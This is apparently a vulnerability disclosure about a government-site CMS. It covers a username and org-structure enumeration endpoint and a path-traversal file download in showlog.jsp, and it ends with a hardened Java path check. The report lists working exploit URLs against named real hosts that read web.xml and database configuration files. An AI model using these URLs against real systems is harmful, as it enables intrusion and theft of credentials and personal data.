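### Brief description:
Back to work, back to work.
### Detailed description:
There is an issue at one endpoint that allows enumerating all usernames, together with the organizational structure! Even the leaders' names are leaked.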
http://www.gansu.gov.cn/jis/objectbox/selx.jsp?tabid=1&limit=1&f_id=userid&f_name=vc_username&date=
[<img src="https://images.seebug.org/upload/201402/201003077c36051bff6b7314b6d81ee6b7da45c8.png" alt="image105.png" width="600">](https://images.seebug.org/upload/201402/201003077c36051bff6b7314b6d81ee6b7da45c8.png)
http://ln-n-tax.gov.cn/jis/objectbox/selx.jsp?tabid=1&limit=1&f_id=userid&f_name=vc_username&date=
[<img src="https://images.seebug.org/upload/201402/201003261908a1de5b3d11e875460e67bfaba731.png" alt="image107.png" width="600">](https://images.seebug.org/upload/201402/201003261908a1de5b3d11e875460e67bfaba731.png)
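### Proof of vulnerability:
There is also an arbitrary file download issue at another location!
For sites that require registration, first register a user at /jis/front/userregister.jsp. Some of them do not require login.
jis/manage/databak/showlog.jsp
The path parameter
```
String strTitle = "机构信息→恢复";
// "path" is taken from the request without any validation
String path = Convert.getParameter(request,"path");
String strFilePath = application.getRealPath("");
// The user-controlled value is concatenated directly under the backup
// directory, so "../" segments are not removed
strFilePath = strFilePath+"/manage/databak/databakbag/"+path;
TxtHandle txtHandle = new TxtHandle();
txtHandle.setEncoding("GBK");
// The file at the resulting path is read and its content is displayed
String content = txtHandle.getStringFromFile(strFilePath);
if(content.length()>7){
    // Insert a line break after the first 8 characters and after each "!"
    content = content.substring(0,8)+"\n"+content.substring(8,content.length());
    content = content.replaceAll("!","!\n");
}
```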
http://management.ysx.gov.cn/jis/manage/databak/showlog.jsp?path=../showlog.jsp
http://www.gansu.gov.cn/jis/manage/databak/showlog.jsp?path=../showlog.jsp
[<img src="https://images.seebug.org/upload/201402/201011237c3e7fb84f774a7bf0b2098e87d857bb.png" alt="image091.png" width="600">](https://images.seebug.org/upload/201402/201011237c3e7fb84f774a7bf0b2098e87d857bb.png)
http://www.gansu.gov.cn/jis/manage/databak/showlog.jsp?path=../../../WEB-INF/web.xml
[<img src="https://images.seebug.org/upload/201402/20101158385f56dc7f027f239ecabacf3c1e29ed.png" alt="image092.png" width="600">](https://images.seebug.org/upload/201402/20101158385f56dc7f027f239ecabacf3c1e29ed.png)
http://www.gansu.gov.cn/jis/manage/databak/showlog.jsp?path=../../../WEB-INF/ini/merpserver.ini
[<img src="https://images.seebug.org/upload/201402/20101222ffad9a27f6990cfde1d0f2f94de5c1b4.png" alt="image094.png" width="600">](https://images.seebug.org/upload/201402/20101222ffad9a27f6990cfde1d0f2f94de5c1b4.png)
http://www.gansu.gov.cn/jis/manage/databak/showlog.jsp?path=../../../WEB-INF/config/dbconfig.xml
[<img src="https://images.seebug.org/upload/201402/20101240e6fd5b3ff4d50ba7581ef7a4cfdee233.png" alt="image095.png" width="600">](https://images.seebug.org/upload/201402/20101240e6fd5b3ff4d50ba7581ef7a4cfdee233.png)
http://jd.ningbo.gov.cn/jis/manage/databak/showlog.jsp?path=../showlog.jsp
[<img src="https://images.seebug.org/upload/201402/20101319873981669951dc7441e5b91328282f58.jpg" alt="20140220101301.jpg" width="600">](https://images.seebug.org/upload/201402/20101319873981669951dc7441e5b91328282f58.jpg)
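
A hardened version of the path handling in showlog.jsp, as an added example that is not the vendor's code: it canonicalizes the requested name and rejects anything that resolves outside the backup directory. The class and method names (`BackupLogPath`, `resolveInside`) and the temporary directory layout are assumptions made for illustration, and it uses `java.nio.file` in place of the page's `TxtHandle`.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

// Hypothetical helper, not part of the product discussed on this page.
public class BackupLogPath {
    /** Resolve a user-supplied log name under baseDir, or throw if it escapes. */
    static Path resolveInside(Path baseDir, String userPath) throws IOException {
        if (userPath == null || userPath.isEmpty() || userPath.indexOf('\0') >= 0) {
            throw new SecurityException("empty or malformed path");
        }
        Path base = baseDir.toRealPath();                     // canonical base, symlinks resolved
        Path candidate = base.resolve(userPath).normalize();  // collapses "../" segments
        if (!candidate.startsWith(base)) {                    // component-wise prefix check
            throw new SecurityException("path escapes backup directory");
        }
        // Resolve symlinks on the target as well; it must exist and be a regular file.
        Path real = candidate.toRealPath();
        if (!real.startsWith(base) || !Files.isRegularFile(real)) {
            throw new SecurityException("not a regular file inside backup directory");
        }
        return real;
    }

    public static void main(String[] args) throws IOException {
        // Constructed layout mirroring the page: <webroot>/manage/databak/databakbag/
        Path webroot = Files.createTempDirectory("webroot");
        Path bag = Files.createDirectories(webroot.resolve("manage/databak/databakbag"));
        Files.write(bag.resolve("restore.log"), "ok".getBytes());
        Files.createDirectories(webroot.resolve("WEB-INF"));
        Files.write(webroot.resolve("WEB-INF/web.xml"), "<web-app/>".getBytes());

        // One legitimate name plus two of the path values shown on this page.
        String[] inputs = { "restore.log", "../showlog.jsp", "../../../WEB-INF/web.xml" };
        for (String in : inputs) {
            try {
                System.out.println("ALLOW " + in + " -> " + resolveInside(bag, in));
            } catch (SecurityException | IOException e) {
                System.out.println("DENY  " + in + " (" + e.getMessage() + ")");
            }
        }
    }
}
```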